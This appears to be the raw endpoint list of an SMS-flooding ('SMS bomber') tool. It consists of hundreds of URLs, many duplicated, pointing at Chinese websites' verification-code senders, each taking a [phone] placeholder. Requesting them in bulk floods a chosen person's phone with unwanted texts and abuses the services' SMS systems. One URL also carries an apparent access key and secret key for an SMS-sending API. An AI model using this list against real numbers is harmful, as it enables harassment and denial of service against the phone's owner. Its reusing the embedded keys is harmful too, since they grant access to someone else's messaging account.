"https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://wwww.0cskj.top/api.php?act=user&key=L747V6vp26fVFuvp0&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://wap.zt.raiyi.com/weixin/bind/verifyMobile?mobile=[phone]&appCode=fc_wx&buyChannel=OfficialAccounts&vtype=0", - "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", - "https://api.julym.com/hz/api.html?number=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://m.tk.cn:80/tkmobile/orderSentSmsServlet?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", - "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "http://www.1314.buzz/index.php?hm=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://user.daojia.com:80/mobile/getcode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", - "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "http://vapi.yuike.com/1.0/user/is_register.php?phone=[phone]&sign=69f0ce3725947d7f9d6b798e68700f3a&yk_pid=3&yk_appid=1&yk_cc=yuikemall&yk_cvc=319&mid=457465", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://cfapi.yaomengwang.cn/local/v1/account/regist/sms?mobile=[phone]", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - 